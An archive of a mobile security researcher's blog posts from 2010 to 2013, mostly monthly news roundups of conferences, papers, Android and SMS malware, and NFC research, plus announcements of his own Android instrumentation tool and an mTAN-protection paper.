Collin R. Mulliner

Countering SMS/mTAN Trojans

Wed, 08 May 2013 20:58:00 GMT

Together with my former colleagues Ravi, Patrick, Jean-Pierre from TU Berlin / SecT I have been working on an enhancement for mobile phones in order to protect SMS messages especially mTANs against trojans.

We investigated several ways to improve mTAN security and finally came to the conclusion that we just need to change the SMS routing on the mobile phone itself.

Basically we remove SMS messages that contain mTANs from the normal delivery queue and only deliver them to a special application. This way no other program (including trojans) can access the SMS message.

We implemented and tested our idea on Android. The paper SMS-based One-Time Passwords: Attacks and Defense will be presented at DIMVA 2013 in July in Berlin, Germany.

A demo video of the prototype is shown below:

Mobile Security News Update May 2013

Tue, 07 May 2013 19:11:00 GMT

Conferences

Some interesting upcoming talks! I guess everybody else an their moms are waiting to hear back from the Black Hat USA CfP.

SyScan'13 review

SyScan was a totally awesome event. Really good talks and lots of them. My favorite talk was: Bochspwn: Exploiting Kernel Race Conditions Found via Memory Access Patterns by Mateusz Jurczyk and Gynvael Coldwind.

News

ACLU Files FTC Complaint Over Android Smartphone Security

Links

Changing the IMEI, Provider, Model, and Phone Number in the Android emulator

Securing Two-factor Authentication for Smartphones in a Usable Way by Adding a Connected Token

Android Apps: What are they doing with your precious Internet?

Mobile Security News Update April 2013

Thu, 11 Apr 2013 23:50:00 GMT

Conferences:

HackCon

Call for Papers:

The 14th International Workshop on Information Security Applications (WISA2013)

News:

Unlocking the Motorola Bootloader

I have been super busy with work so I might missed a few things here and there. Right now I'm waiting to here back from SummerCon and Black Hat USA about talks I submitted. I'm still thinking about submitting to ReCON ;)

Mobile Security News Update March 2013 part 2

Thu, 14 Mar 2013 22:40:00 GMT

CanSecWest was pretty good this year. My favorite talks were (no order): Desktop Insecurity - Ilja van Sprundel & Shane "K2" Macaulay, Smart TV Security - SeungJin Lee, Godel's Gourd - Fuzzing for Logic Issues - Mike "dd" Eddington, and Reflecting on Reflection - Exploiting Reflection Vulnerabilities in Managed Languages - James Forshaw. I can't wait to get the slides.

Call for Papers:

Workshop on Offensive Technologies (WOOT)

SummerCon

BeaCon

I totally missed Black Hat Europe, it had some interesting talks: The M2M Risk Assessment Guide, A Cyber Fast Track Project - Don A. Bailey, Practical Attacks Against MDM Solutions - Daniel Brodie + Michael Shaulov, Off Grid Communications With Android- Meshing The Mobile World - Josh Thomas + Jeff Robble, Next Generation Mobile Rootkits - Thomas Roth.

An interesting looking paper from TROOPERS13 UI Redressing Attacks on Android Devices (apparently it was released at Black Hat Abu Dhabi last year).

News

Andy Rubin steps down as head of Android

A few android security issues

Under the Hood: Dalvik patch for Facebook for Android

Fun find by my former co-worker Matthias: Lost connection to Battery ... WTF!?!

Mobile Security Update March 2013

Mon, 04 Mar 2013 17:14:00 GMT

Review RSA

Mobile Security Battle Royale

Big Brother's Greek Tragedy State-Deployed Malware & Trojans

SC Magazine

Android certainly does support remote updates. But the problem really is that manufacturers and mobile carriers stop supporting devices after 12-18 month.

Conferences

Infiltrate

Troopers

Hack in the Box Amsterdam

New Conferences

NSC - NoSuchCon

News

HTC Settles Privacy Case Over Flaws in Phones

The Federal Trade Commission charged HTC with customizing the software on its Android- and Windows-based phones in ways that let third-party applications install software that could steal personal information, surreptitiously send text messages or enable the device's microphone to record the user's phone calls.

Personal note:

Android Hacker's Handbook

Mobile Security News Update February 2013

Thu, 31 Jan 2013 17:46:00 GMT

Conferences:

News:

The end of the line for Symbian

Android botnet abuses people's phones for SMS spam

Personal notes: I'm going to be in San Francisco during RSA, ping me if you want to chat. I'm also going to be at CanSecWest, just attending this year. Further I'm going to SyScan. I also plan to be around SourceBoston but unfortunately not attending (ticket prices vs. university etc, I'm not complaining).

Mobile Security News Update January 2013

Fri, 04 Jan 2013 15:45:00 GMT

Conferences:

Shmoocon 2013

All other upcoming conferences (SyScan, CanSecWest, SourceBoston, Infiltrate) haven't posted any talks yet.

My 29c3 conference review. The new location CCH in Hamburg is really nice. There is a lot of space and the space was used very well. Due to the space the conference was much more relaxed. This also counted for the talks. Most of the time everybody had a place to sit. One small downside of this years conference the schedule, sometimes three tech talks were running in parallel in different rooms. But all together I don't think anybody could complain about 29c3. For me personally one of the best congresses I ever attended. The recordings of the talks can be downloaded from here.

Happy New Year.

Mobile Security News Update December 2012

Wed, 12 Dec 2012 16:39:00 GMT

Conferences:

29c3

News:

Top Mobile Vulnerabilities And Exploits Of 2012

top list

Hacking Windows 8 Games

Random stuff:

Shipped-Roms.com

Android SMS Spoofer

Android DBI v0.2 (BreakPoint version)

Fri, 30 Nov 2012 22:32:00 GMT

I finally managed to release v0.2 of my Android DBI framework. The version I announced at BreakPoint and RuxCon.

New in this version: actually working Thumb support, nfc card emulation code for fuzzing.

Slides
collin_android_dbi_v02.zip

Happy hacking! Feedback is welcome!

Mobile Security News Update November 2012

Wed, 21 Nov 2012 23:23:00 GMT

The last weeks were pretty crazy for me in terms of work, but stuff got done so I have some new stuff to show next year.

Last month I've travelled to Melbourne Australia to speak at BreakPoint and RuxCon. This was my first time travelling to Australia and I must say it was good fun. BreakPoint was a good conference with some good talks and many interesting people. RuxCon was great fun too, good talks, nice friendly people. The trip was just too short.

Conferences

Black Hat Abu Dhabi

BayThreat

Nico's

Other upcoming conferences are: ShmooCon in February, CanSecWest in March, Infiltrate in April, and Source Boston also in April.

As I said, crazy weeks behind me. So I didn't see much of what happened in the mobile security space.

DIMVA 2013

Mon, 29 Oct 2012 15:46:00 GMT

I'm the Publicity Chair for the upcoming 10th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA 2013), thus I'm taking the liberty to announce the opening of our Call for Papers here. The conference is in July 2013 in Berlin, Germany. A good chance to travel to Berlin next summer.

DIMVA 2013 main site.
DIMVA 2013 CFP

Mobile Security News Update September 2012 part 2

Tue, 25 Sep 2012 17:18:00 GMT

First I want to talk about Ravi's awesome findings on USSD and TEL URIs (RFC 2806). Ravi was working on USSD security in general and found that on Android phones you can inject USSD codes into the phone dialer via the TEL URI handler without user interaction. Meaning you don't have to press the call button (aka the green button) to activate the USSD code. Using this he showed howto brick SIM cards and howto wipe Samsung made Android phones. The beauty about TEL URIs is that it is super easy to have them activated on a mobile phone. In 2010 I did a talk on this at CanSecWest (Random tales from a mobile phone hacker skip to the end of the talk for the TEL/SMS URI stuff). The basic technique used for this kind of attack are iframes but very well can be any other kind of URI activation method (redirects, img tag, etc.).

A video of Ravi's demo from Ekoparty is here Demo Dirty use of USSD Codes in Cellular Network en Ekoparty 2012.

Further infos:

RFC2806

iPhone/iOS auto dialer bug

This is a super fun bug class also a little bit sad that stuff like this works at all.

Second, more cool NFC/RFID mobile hacking from the good guys at Intrepidus. They investigated RFID based transit passed and wrote an Android application that can reset the pass. While the actual basic idea is not new I really like the phone as the attack tool since you always carry it around with you. Some guy could stand one the corner next to the subway entry and sell you the service of resetting your transit pass. Check out their writeup: UltraReset - Bypassing NFC access control with your smartphone

On the topic of NFC and security. The guy(s) behind RadioWarCN released an Android toolkit for messing with RFID/NFC tags. Check it out here: Radiowar Release NFC-WAR Preview. I didn't had the time to try it myself.

Conferences:

ToorCon

hwsec.net

That is it for now. I'm super busy working one a new Android security project. This will kick ass.

Mobile Security News Update September 2012

Mon, 10 Sep 2012 20:58:00 GMT

Conferences:

Links:

State of Mobile Security 2012

HushSMS got cracked again. Do I care? No! Should you? Yes! (read why)

Multiple Samsung (Android) Application Vulnerabilities

Mobile Security News Update August 2012 part

Mon, 20 Aug 2012 21:49:00 GMT

More conferences!

T2 does not seem to have any mobile stuff this year.

More upcoming CFPs should include ToorCon in San Diego but sadly it overlaps with BreakPoint. I would really like to go to ToorCon once.

It looks like I will come to NYC in November to give a talk at an event at NY-Poly. It is also likely that I will come to SF early in December.

News:

SMSZombie Malware Infecting Android Devices, Stealing Money

By now I arrived in Boston and started working at my new job at Northeastern University. So far I haven't done much in the city. I'm still looking for an apartment so if you have good pointers shoot me an email.

Mobile Security News Update August 2012

Tue, 07 Aug 2012 17:13:00 GMT

This really is the first update since May, wow I have been really busy.

Conferences:

Toorcamp

Nordic Security Conference

BruCON

BreakPoint

Source Seattle

Open CFPs: 29c3 this year in Hamburg not Berlin, a real bummer. hashdays in Lucerne, Switzerland.

General News:

supports

Black Berry

SecT

Personal news: I will move to Boston, MA in August to work as a Postdoctoral researcher at Northeastern University. I will continue doing mostly mobile security related work. Please ping me if you are doing similar work and are in the area. It seems like I know a bunch of people but don't actually know where they live.

I hope from now one to continue my biweekly mobile security news update.

Android DBI Framework Source!

Tue, 19 Jun 2012 12:04:00 GMT

I just uploaded my Android Dynamic Binary Instrumentation (DBI) framework. As I wrote before the framework is very simple. It supports hooking function entry points only. The source includes the shared library (.so) injector and the hooking/patching functionality. I also included one simple example instrument to sniff the UART communication between com.android.nfc and the NFC chip on a Galaxy Nexus.

I plan to further enhance this toolset and welcome everybody to submit patches. If there is a lot of interest I will move the source to a public archive like github.

The first release is available here: collin_android_dbi_v01.zip

To use this tool you need a Linux ARM gcc compiler such as included in the Android NDK.

Binary Instrumentation on Android

Mon, 11 Jun 2012 18:32:00 GMT

Last weekend I attended SummerCon in Brooklyn NYC and presented my take at doing binary instrumentation on Android. My way of doing instrumentation is very simple compared with other instrumentation frameworks but so far nobody build and released anything for Android / ARM so I had to build my own. Have said that I will for sure release my framework I just need a few days to do this! Please feel free to bug me about this!

So why did I start with binary instrumentation? Well I wanted to continue my NFC security research on Android. Since NFC involves extra hardware it also includes a bunch of native code and thus I started instrumenting that. The result so far was that I build an instrument that acts as an emulation layer inside com.android.nfc. This emulation layer allows me to inject payloads of RFID tags into the nfc process as if they where read from an actually tag. This is of course build for fuzzing ;-) I haven't done any real fuzzing using this so far because I just finished the tool before SummerCon. A demo video that shows tag read emulation can be seen here: nfcemuvideo.mp4

More updates on both subjects will follow soon!

SummerCon was totally awesome, many thanks to the organizers! The conference was small enough to speak to all presenters and to many of the attendees. I met like half of the US people I follow on twitter for the first time in person. How awesome is this!

Mobile Security News Update May 2012 part 2

Wed, 23 May 2012 11:58:00 GMT

Conferences:

Black Hat USA

Defcon

Papers:

Off-Path TCP Sequence Number Inference Attack

Security week in Europe, we have: HITB in Amsterdam, Confidence in Krakow, BerlinSides in Berlin lets hope all the people who fly out for HITB and Confidence make it over to Berlin for the weekend.

Mobile Security News Update May 2012

Wed, 09 May 2012 12:45:00 GMT

Conferences:

Hack in The Box Amsterdam

SummerCon

Recon

Black Hat USA

Nordic Security Conference

So I will be going to SummerCon this year after all! I'm staying in NYC for a few days even after SummerCon. Ping me if you want to meet.

Other news:

20 years of SMS

Links:

R&D Into JTAG Process in Relation to Blackberry 8130

Some fun:

Free Apps Stealing your personal info

A tazer that looks like a cellphone

EOF

Mobile Security News Update April 2012

Thu, 12 Apr 2012 10:04:00 GMT

It has been a while but I was travelling a lot for work and fun so I really didn't have time.

Conferences:

Hackito Ergo Sum

SyScan Singapore

Upcoming in June without program yet: SummerCon in NYC (sadly I can't make it), Recon in Montreal (which I try to make).

On the academic front please consider submitting to WOOT one of my favorite workshops!

Mobile Security News Update February 2012 update

Fri, 10 Feb 2012 15:08:00 GMT

More conferences, and a lot of mobile stuff :-)

Source Boston

Black Hat Europe

Mobile Security News Update February 2012

Thu, 09 Feb 2012 15:38:00 GMT

Conferences:

CanSecWest

SyScan Singapore

Troopers

Links:

Database for Android Malware

Google Wallet PIN security cracked in seconds

Android.Bmaster: A Million-Dollar Mobile Botnet

An analysis of the GMR-1 and GMR-2 standards for satellite telephony. Really interesting work.

In other news. I'm done with my work in Berlin and looking to move to the US for a postdoc in the near future (location is not yet decided).

Mobile Security News Update January 2012 part 2

Mon, 16 Jan 2012 11:37:00 GMT

Conferences:

Infiltrate

Shmoocon

CanSecWest

Links: Infographics: Mobile Security Android vs. iOS

The video recordings from 28c3 are online. Check out Harald's talk Cellular protocol stacks for Internet, Luca's and Karsten's talk Defending mobile phones, Sylvain's talk Introducing Osmo-GMR.

Mobile Security News Update January 2012

Mon, 02 Jan 2012 21:41:00 GMT

so 2011 is history, it was a fun year for us mobile people. Many things happened many things got hacked - just great.

In the last few days I have been reading some of those security predictions for 2012 (this year!). Most of them 1 2 3 4 5 are kinda boring since these are things that are already happening. Never the less these will very likely become reality.

In the mobile area these seem to be:

Android as the target for mobile malware attacks. This is already happening as Android became the major smartphone platform last year.

Mobile Markets such as the AppStore and Android Market as a key issue problem solver in the mobile field.

More Monetization as mobile malware evolves we will see more monetization of it. This is especially interesting for everything that involves spending money using a smartphone. Not only SMS, but advertisement, in-App payment, the phone as a credit card, etc..

Happy mobile security research 2012 to everybody!

Mobile Security News Update December 2011 part 2

Tue, 20 Dec 2011 11:39:00 GMT

There was an awesome SMS bug in Windows Phone 7. This is exactly the bug class I have been looking into in the last two years. Too bad that I didn't have the time to look into Windows Phone 7.

Corrections to a news article about my research. NFC mobile threats on the horizon: What happens when we wave our wallets to pay? The article says ...malicious code could be 'injected' into the device.... I want to say that I never claimed I can do code injection through NFC. They probably misunderstood me when I said that this could be possible in the future.

It is really great to see how NFC security research is taking of this year. If I remember back to early 2008 when I did my research everybody was kinda laughing.

In other news mobile (in)security is further on the rise. So we all never loose our jobs!

Mobile Security News Update December 2011

Thu, 01 Dec 2011 11:49:00 GMT

Android root exploit for 2.3.5 and older by the Jons levitator.c

I don't get this whole Carrier IQ thing 1 2.

The people from the Intrepidus Group seem to really get into RFID and NFC. They just posted an article about using a USRP for NFC. Hopefully they release their code after they are done with their research.

In other news: I wont attend the CCC / 28c3 this year due to multiple reasons. I will stick around for the other events outside the congress. So ping we if you want to chat and/or have beers.

Mobile Security News Update November 2011

Fri, 18 Nov 2011 14:24:00 GMT

Security Mobile and RFID by Nick von Dadelszen at KiwiCon. Interesting talk on RFID attacks using the Nexus S. This does not cover NFC but is a good read. Unfortunately not many details in the slides.

Axelle Apvrille did some nice work on how to utilize OpenBTS for mobile malware analysis. Both, paper and slides, make a nice read.

Ruxcon is already on, I found one possibly interesting talk Mobile and Contactless Payment Security by Peter Fillmore. But since the con is not done yet slides are not available at the time.

SyScan Taipei has a bunch of mobile stuff. Charlie Miller on iOS code signing. Stefan Esser on iOS kernel exploitation. I'm waiting for slides as the con is just over today.

New Academic Workshop MoST on Mobile Security Technologies at IEEE S&P in May 2012.

Mobile Security News Update August 2011

Sat, 20 Aug 2011 12:58:00 GMT

I'm finally back from my two weeks in the US of A where I attended Black Hat and Defcon (19) in Vegas. This was very exhausting as always, no surprise there. But I must say the talk quality was not that high and again too many parallel tracks at Black Hat. As I see it now I will probably skip Black Hat and Defcon in the near future. After Vegas I travelled to USENIX Security in San Francisco to finally present our paper on SMS insecurity on feature phones. USENIX was quite okay - but I didn't get to enjoy it in full due to the one week of Las Vegas before :-/ To compensate for the stressful travel I attended the last two days of the CCCamp outside of Berlin. Also I only attended the lasts days the CCCamp rocked! Still one of the best events ever!

News:

So Palm is finally dead now that HP killed their WebOS devices. Although I've read something about HP wanting to continue with developing WebOS as a platform but this is kinda useless if they don't intend to sell devices running WebOS. Sad sad thing. Conferences:

DeepSec

Hack.lu

Hack in the Box Malaysia

hashdays

Thats this for now. I guess I missed a bunch of things during the last three weeks (two weeks of travel and one week of recovery!). If something major had happened in the mobile sec world I guess I would have heard about it ;-)

Mobile Security News Update July 2011 part 2

Mon, 18 Jul 2011 10:03:00 GMT

Not much to tell in this update since I was kinda busy with non work stuff ;-)

Conferences:

Chaos Communication Camp

Defcon

BruCon

Links:

Exploring Android Malware

L4Android

L4OpenBSD

Mobile Security News Update July 2011

Mon, 11 Jul 2011 11:38:00 GMT

ZIMTO (Zeus in the Mobile) hits Android. This was long overdue since Android now more or less is the strongest smartphone platform. See Axelle Apvrille blog post on Zimto for Android.

Android malware is really a rising trend (no secret there) but the malware gets more and more interesting. Mark Balanz discovered a malware that acts as an SMS relay. Such malware has interesting possibilities to say the least.

JailBreakMe 3.0 was released a couple of days ago, again a nice user-level jailbreak for all iOS devices ;-) There is a nice article from the people of the intrepidus group on how the jailbreak works. Reversing Jailbreakme.com 4.3.3.

Conferences are all covered as far as I know.

Mobile Security News Update June 2011 part 2

Mon, 20 Jun 2011 09:40:00 GMT

Not too much happened or I just missed it because I'm way to busy these days. I'll just update my mobile conference monitor.

Conference:

Black Hat USA

Defcon

Mobile Security News Update June 2011

Wed, 08 Jun 2011 14:43:00 GMT

There seems to be a massive rise in Android malware. Mostly modified versions of legit applications. Again one piece of malware [1] contains a root exploit - the one already used by DroidDream. Many of the new trojans will try sending SMS messages to premium numbers. Other SMS trojans are just funny [2] as they send jokes to every entry in the phonebook.

Conferences:

BlackHat USA

Brucon

NinjaCon / BSides vienna

ToorCon Seattle

Defcon

Every since Google announced Google wallet I'm getting hammered with requests regarding NFC security. Funny part about that I just was getting back working on NFC security because of the Nexus S. First bug reports already filed ;-). Due to the new rising interest in NFC and NFC security I'll decided to give a NFC security talk at NinjaCon / BSides Vienna on June 18th.

Mobile Security News Update May 2011

Tue, 10 May 2011 12:10:00 GMT

So Foursquare has started to use NFC: Foursquare NFC checkin. This sounds like fun :-) I guess you can't seriously do harm but pranks sound possible.

Moxie is really cracking out cool Android stuff lately. He just released WhisperMonitor a personal firewall for Android.

Slides for the Android Attacks talk from Infiltrate. Really really good and complete talk on Android security.

Academic papers:

Usenix Security 2011

Conferences:

An OpenBTS GSM replication jail for mobile malware by Axelle Apvrille Fortinet

Android malware is on the rise by Timothy Armstrong and Denis Maslennikov

That is it for May I guess. Since I'll be either traveling or writing papers ;)

Mobile Security News Update April 2011 (part 2)

Tue, 26 Apr 2011 15:40:00 GMT

A nice blog post by Frank Rieger on the iPhone location logging: Was the iPhone location logging put in by quiet law-enforcement / intelligence agency request?

The talk A Million Little Tracking Devices by Don Bailey is really worth reading if you are in to GSM and GSM equipped hardware.

Whisper Systems (Moxie) released their Android FDE image for the Nexus One. Try it out and go full disk crypto on your Android phone. Whispercore.

News:

Skype for Android Leaks your Private Data

Conferences:

Recon

In other news. I'll be in SF for Oakland 2011. I'll be there a few days before the conference so ping me if you want to meet up.

Mobile Security News Update April 2011

Thu, 14 Apr 2011 09:39:00 GMT

Conferences:

SyScan Singapore

Infiltrate

SourceBosten

Hack in The Box Amsterdam

The mTAN trojan problem finally spread over to Europe and Germany. This version is called SpyEye and comes as a developer signed Symbian application.

Nico and myself finally released our Tech Report on SMS filtering recommendations. It's available here: Countering SMS Attacks: Filter Recommendations. Feedback is welcome.

I guess I missed a bunch of stuff but right now I'm kinda busy with work ;-)

Mobile Security News Update March 2011 part 2

Thu, 17 Mar 2011 18:20:00 GMT

The BlackBerry pwnage seems to cause some trouble as RIM seems to not tell the truth (1 2) in their advisory. Lets see what happens here.

Finally the first Android mod with encrypted storage was released by Whisper Systems. This is really really cool. Now they just need to support more Android devices besides the Nexus S. But moxie told me they are adding support for more soon :-)

For those of you interested in NFC there are two interesting papers from this years NFC Conference 1) Security Vulnerabilities of the NDEF Signature Record Type 2) Practical Attacks on NFC Enabled Cell Phones.

Mobile Security News Update March 2011 (part 1 continued)

Wed, 02 Mar 2011 12:08:00 GMT

March looks busy for mobile security people ;-)

Android Malware becomes serious: The Mother Of All Android Malware Has Arrived: Stolen Apps Released To The Market That Root Your Phone, Steal Your Data, And Open Backdoor. This malware contains a root exploit. Yea, after you install the APK it roots your device.

Interesting papers (from ACM Hotmobile 2011)

MockDroid: trading privacy for application functionality on smart phones

Mobile Token-Based Authentication on a Budget

Mobile Security News Update March 2011

Tue, 01 Mar 2011 10:04:00 GMT

Very brief update, but I'm quite busy at the moment.

News:

Android Trojan found in alternative app markets

ZeuS in the Mobile is back

Conferences:

LEET'11

Why Mobile-to-Mobile Wireless Malware Won't Cause a Storm

Andbot: Towards Advanced Mobile Botnets

Mobile Security News Update February 2011 part 2

Mon, 21 Feb 2011 10:43:00 GMT

As I wrote in my last blog entry last week I attended the Mobile World Congress in Barcelona. Over all it was quite interesting, meeting old friends and people so far I knew only through email.

I also had a nice chat with Elinor Mills from CNET about Visa's NFC payment stuff at the Visa booth at MWC. Her article is here: Mobile phone e-wallets get closer to reality

In two weeks Nico and I am going to speak at CanSecWest about our feature phone SMS research. I'm really looking forward to Vancouver again.

Conferences:

New Age Attacks Against Apple's iOS (and Countermeasures)

iPhone and iPad Hacking

Project Ubertooth: Building a Better Bluetooth Adapter

SMS-o-Death

Here a collection of some ShmooCon 2011 video recordings.

Mobile Security News Update February 2011

Wed, 02 Feb 2011 12:23:00 GMT

Some comments on smartphone botnet C&C over SMS from Shmoocon 2011: this is basically a redo of my iBots paper. The only difference is the implementation for Android in place of our iPhone implementation.

Also from ShmooCon: Attacking 3G and 4G mobile telecommunications networks looks quite interesting.

Sadly I didn't find the slides for the other interesting talks, especially for TEAM JOCH and the mTan talk. Also what about the video streams from ShmooCon, were they recorded?

Interesting story: Would-Be Suicide Bomber Killed by Unexpected SMS From Mobile Carrier if this is true...

Mobile Security News Update January 2011 Part 2

Mon, 24 Jan 2011 12:08:00 GMT

Funny story on stealing SIM cards from traffic lights, Schneier has a few nice pointers on the story: here.

Don't Sacrifice Security on Mobile Devices by Chris Palmer (@ EFF) makes a nice read. Spontaneous idea: what about something like hardened android?

A story on mobile phone forensics.

A Android trojan with botnet-like features?

Conferences:

ShmooCon

BlackHat DC

A practical attack against GPRS/EDGE/UMTS/HSPA mobile data communications

Exploiting Smart-Phone USB Connectivity For Fun And Profit

Upcoming events for myself: Mobile World Congress, I'll be there for all four days. Catch me at Hall: 2 Booth: H04 (City of Berlin -> Technische Universitaet Berlin and others)

Mobile Security News Update January 2011

Mon, 10 Jan 2011 16:44:00 GMT

Happy new year mobile phone security enthusiasts!

Conferences:

Black Hat DC

Shmoocon

Bugs:

SMS are intermittently sent to wrong and seemingly random contact.

Finds:

ClamTXT

Mikko Hypponen

SMS-o-Death @ 27c3

Fri, 24 Dec 2010 12:25:00 GMT

Finally our (Nico and myself) talk SMS-o-Death is in the 27c3 schedule. The talk will be kick ass.

Antid0te - ASLR for the iPhone

Wed, 22 Dec 2010 22:50:00 GMT

Stefan Esser of PHP Security fame released a tool called Antid0te to add ASLR to jailbroken iPhones.

This looks like really awesome work, very interesting slides.

Mobile Security News Update December 2010

Wed, 22 Dec 2010 12:36:00 GMT

I will give a talk at the 27th Chaos Communication Congress together with my student/colleague Nico Golde The title of our talk is SMS-o-Death: from analyzing to attacking mobile phones on a large scale. The talk is about attacking feature phones. This should be very interesting for everybody since we put quite some effort into this research and prepared a good talk. This will be on Day-1 in Saal 1. (We are still not listed yet).

I hope to see many of you guys at the congress!

TAC Database needed for research...

TAC

Smartphone security paper by enisa

Smartphones: Information security risks, opportunities and recommendations for users

Past conferences:

POC2010

Fun:

My Blackberry Is Not Working!

Mobile Security News Update November 2010 part 2

Thu, 02 Dec 2010 11:19:00 GMT

DeepSec was real good and a lot of fun this year. Especially putting faces to email/twitter accounts. The mobile talks were really good and there was a lot to learn and spark new project ideas ;)

Quickies:

Spoof your geolocation

Android Data Stealing Vulnerability thru the web browser.

Mobile Security News Update November 2010

Tue, 09 Nov 2010 18:49:00 GMT

Kinda happy about my iBots paper, since I got two non-academic reviews about it. 1 and 2.

Conferences: It is fixed that I will go to DeepSec in late November. It's kind of a must since they have a strong mobile security program this year.

Unfortunately I missed hashdays in Lucerne. This seems to be a nice event and I'll try to go next year. This reminds me once again that we have many cool Cons here in Europe.

Bugs: once again Safari on the iPhone starts voice calls without user interaction this time powered by Skype. See here. Very similar to the bug I found last year. Nice catch.

In the news: Hackers take control of 1 million mobile phones apparently some trojan (user installed) sent out a lot of SMS spam.

Mobile Security News Update October 2010

Sun, 31 Oct 2010 15:36:00 GMT

I got mentioned on the McAfee blog iBots? Mobile phone network 0wnage for my work on smartphone botnet C&C.

Ralf published is awesome work on mobile/smart phone baseband attacks. The slides to his talk All Your Baseband are Belong to Us are available here.

Travel / Cons:

In late November I plan to go to Vienna for DeepSec, who else is coming?

In December I will be speaking at Cisco Expo Germany (in Berlin). Hit me up if your coming.

Mobile Security News Update September 2010 part 2

Fri, 24 Sep 2010 10:16:00 GMT

So from now on I will include academic publications to my news updates. I screen the stuff anyway so why keep it only for me.

ACM CCS

A funny bug in the Nokia E72: Nokia E72 Keyboard Password bypass

Conferences: Upcoming is the 27C3 it's CFP runs until October 9th. I will try to also do a talk this year again.

c't 2010/20 Risiko Smartphone

Sat, 11 Sep 2010 13:27:00 GMT

Together with Daniel Bachfeld from heise I wrote the artikel Risiko Smartphone which will be published in the upcoming issue 20 of the c't magazin (German only). First time mass media publication :-)

Mobile Security News September 2010

Fri, 10 Sep 2010 10:54:00 GMT

Mobile phone HTTP header privacy issue in Spain [1] xuf got them to fix it [2].

In October I will present two papers. First, Privacy Leaks in Mobile Phone Internet Access which is about mobile phone HTTP header leakage. Second, Rise of the iBots: 0wning a telco network a paper on smartphone botnet C&C.

The Osmocom people have added a security section to their wiki. One really interesting part is the section on Will my Phone Show An Unencrypted Connection?

Conferences: ToorCon has a nice lineup sofar. Real Men Carry Pink Pagers. The Carmen San Diego Project. iPhone Rootkit? There's an App for That. The Hidden Nemesis: Backdooring Embedded Controllers. Smartphone Ownage: The State of Mobile Botnets and Rootkits. Moving Target: Location-Based Threats and Mitigations. Black Hat Abu Dhabi Mobile Phony: Why You Can't Trust Mobile Phone Networks For Critical Infrastructure.

Need some hints

I'm looking for a number of statistics. 1) How many people update their mobile phones (I don't care about smartphones such as iPhone or Android). 2) The most popular mobile phones around the world. There should be some sales stats on this, right? Any help will be very welcome. Email: collin[at]mulliner.org

The thing called a phone by Scott Adams. I almost never use it as a phone.

Mobile Security News August Part 3

Wed, 25 Aug 2010 15:07:00 GMT

So since I have decided to use Flattr I also decided to put my own Thing for Mobile Security News on Flattr.

Mobile Security News August 2010 Part 2

Tue, 24 Aug 2010 15:09:00 GMT

At T2 Nils talks about some WebOS and Android vulns this should be quite interesting since he likely will cover the bugs he recently found. T2 is really one of the European cons I want to go to, very high priority! Especially since I can't go to SEC-T this year. hacking the RKF ticket system and How to stay invisible (while still using cellphones) sounds quite interesting.

The BruCON schedule looks quite interesting. GSM Security: Fact and Fiction NFC Malicious Content sharing, the abstract sounds like something I've done some years ago - I wonder what kind of new stuff they found. The Monkey Steals the Berries: The State of Mobile Security So BruCON actually looks quite good, another CON I need to go to at some point.

At SecTor there seems to be a single mobile talk: Black Berry Security FUD Free.

Thats it for August as far as I can see.

Update: I totallty forgot DeepSec. This year it seems like a mobile only security conference. Talks are: Pentesting Internet Handheld Devices Debugging GSM Targeted DOS Attack and various fun with GSM Um Mobile VoIP Steganography: From Framework to Implementation Mobile privacy: Tor on the iPhone and other unusual devices OsmocomBB: A tool for GSM protocol level security analysis of GSM networks Malicious applications for Smartphones All your baseband are belong to us Android: Reverse Engineering and Forensics LTE Radio Interface structure and its security mechanism

Mobile Security News August 2010

Fri, 13 Aug 2010 15:06:00 GMT

So the PalmPre seems to have a small problem with vCards? Pwn20wn Nils found a nice little bug that seems to be exploitable. Nice find!

Then we got the first Android trojan that sends premium SMS messages. Jon did a nice decode of the trojan over here.

Since this is now on a public website I want to mention it once: Decrypting GSM phone calls by Karsten and other from the Security Research Labs (Berlin)

More Mobile Security News (in July 2010)

Mon, 12 Jul 2010 13:48:00 GMT

A short overview of the talk How to stay invisible (still using cellphones) from PlumberCon. No slides unfortunately.

Some Vulnerable setuid binaries on 4G and HTC Hero (Android phones).

Latest version of Hijacking Mobile Data Connections from the Mobile Security Lab guys this time with iPhone and Android. This was shown at HITB Amsterdam.

Mobile Security News Update July 2010 Part 2

Tue, 06 Jul 2010 09:37:00 GMT

The final schedule for Defcon is out - with a few more talks that should be interesting for us mobile guys. Also I kind of forgot to post some stuff because of my feature phone rant.

Defcon talks: These Aren't the Permissions You're Looking For by some guys from Lookout. This is about Android security. App Attack: Surviving the Mobile Application Explosion by the CXO guys from Lookout.

Unrelated by cool: Advanced Format String Attacks by Paul Haas who was an undergrad student in the RSL at UCSB while I was there, nice!

Android vs. Jon Oberheide :)

Jon recently did a few cool things with Android. His slides from SummerCon 2010. Two interesting blog posts about Remote Kill and Install possibilities on Android and some insides on the GTalkService Connection that is always active between your Android phone and Google. Nice reads!

PS: I organized that I will be able to attend Black Hat :-) So I will get the full Vegas experience once again.

Mobile Security News Update July 2010

Tue, 29 Jun 2010 17:57:00 GMT

Most important thing: I will travel to Defcon this year. Really looking forward to meet some people again. Ping me if you want to meet up!

More and more Defcon talks show up: Exploitation on ARM - Technique and Bypassing Defense Mechanisms by Itzhak "Zuk" Avraham. This is a must see for me.And wow a new Bluetooth security talk, I've been waiting for this. Breaking Bluetooth By Being Bored by JP Dunning. Practical Cellphone Spying by Chris Paget also looks interesting. It looks like there are some more talks in the pipe that are interesting for us mobile guys.

A small rant on feature phones. So we are playing with feature phones, and many of those phones don't support a full hard reset were you can erase all data. WTF??!?! Some manufactures have a PC program to flash those phones in order to restore them. But then they check the software version and don't allow you to reflash the same version. WTF!??!?!

Mobile Security News Update June 2010

Wed, 09 Jun 2010 11:31:00 GMT

Vegas update: Carmen Sandiego is On the Run! by Don Bailey & Nick DePetrillo. They seem to have updated their talk for Black Hat. Very interesting for me but not related to mobile phones: How to Hack Millions of Routers by Craig Heffner. He is talking at both Black Hat and Defcon. So far only one mobile talk at Defcon: This is not the droid you're looking for... by Nicholas J. Percoco and Christian Papathanasiou.

SyScan Singapore has one talk on GSM security by the Grugq (the same one he will give in Vegas).

I'm still looking for a new Android device. The device closest to my needs is a Motorola Milestone (I want a keyboard). But I really don't want to buy a device with a closed bootloader. For sometime I considered a Nexus One even without a keyboard, but the price is a little to high in my opinion.

Mobile Security News May 2010 Part 2

Tue, 25 May 2010 11:03:00 GMT

A paper on mobile phones as bugging devices: Roving Bugnet: Distributed Surveillance Threat and Mitigation.

